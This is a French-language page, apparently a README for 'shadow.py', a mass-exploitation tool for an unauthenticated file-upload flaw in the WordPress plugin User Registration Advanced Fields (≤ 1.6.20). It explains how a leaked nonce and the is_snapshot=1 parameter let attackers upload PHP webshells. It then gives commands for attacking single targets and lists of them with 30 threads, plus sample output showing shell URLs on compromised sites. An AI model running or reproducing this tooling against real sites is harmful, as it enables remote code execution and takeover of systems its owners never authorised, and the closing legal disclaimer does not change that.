
User Registration Advanced Fields <= 1.6.20 - Téléversement de fichier arbitraire non authentifié
User Registration Advanced Fields <= 1.6.20 - Téléversement arbitraire de fichiers sans authentification
User Registration Advanced Fields <= 1.6.20 - Téléversement arbitraire de fichiers sans authentification
Description
Le plugin User Registration Advanced Fields pour WordPress (versions jusqu'à 1.6.20 inclus) est vulnérable à un téléversement arbitraire de fichiers sans authentification via l'action AJAX uraf_profile_picture_upload_method_upload. Le plugin divulgue un nonce valide via wp_localize_script() sur toute page contenant un formulaire d'inscription, et l'utilisation du paramètre is_snapshot=1 contourne entièrement la validation de l'extension des fichiers. Cela permet à des attaquants non authentifiés de téléverser des fichiers arbitraires (par exemple, des webshells PHP déguisés en images GIF), qui sont stockés dans wp-content/uploads/user_registration_uploads/temp-uploads/, conduisant à une exécution de code à distance (RCE) complète.
~ Score CVSS : 9.8 (Critique)
~ Versions affectées : <= 1.6.20
Cible unique :
python3 shadow.py -u https://target.com -s shadow.phpCibles multiples :
python3 shadow.py -f targets.txt -s shadow.php -t 30Mode interactif :
python3 shadow.py
╔══════════════════════════════════════════════════╗
║ CVE-2026-4882 — Full Auto Exploit ║
║ User Registration Advanced Fields <= 1.6.20 ║
║ by: Shadow x Friska 😈🔥 ║
╚══════════════════════════════════════════════════╝
═══ Interactive Mode ═══
📄 Target file (e.g. targets.txt): list.txt
⚡ Threads 1-50 (default 30): 30
🎯 Targets : 75
📁 Shell : shadow.php
⚡ Threads : 30
💣 Brute : 1-500
🩷 [3/75] http://target.com
→ http://target.com/wp-content/uploads/user_registration_uploads/temp-uploads/shadow.php
💀 [1/75] http://example.com — no nonce
❌ [4/75] http://example2.com — upload failed
L'utilisation non autorisée de systèmes que vous ne possédez pas ou que vous n'avez pas la permission de tester est illégale.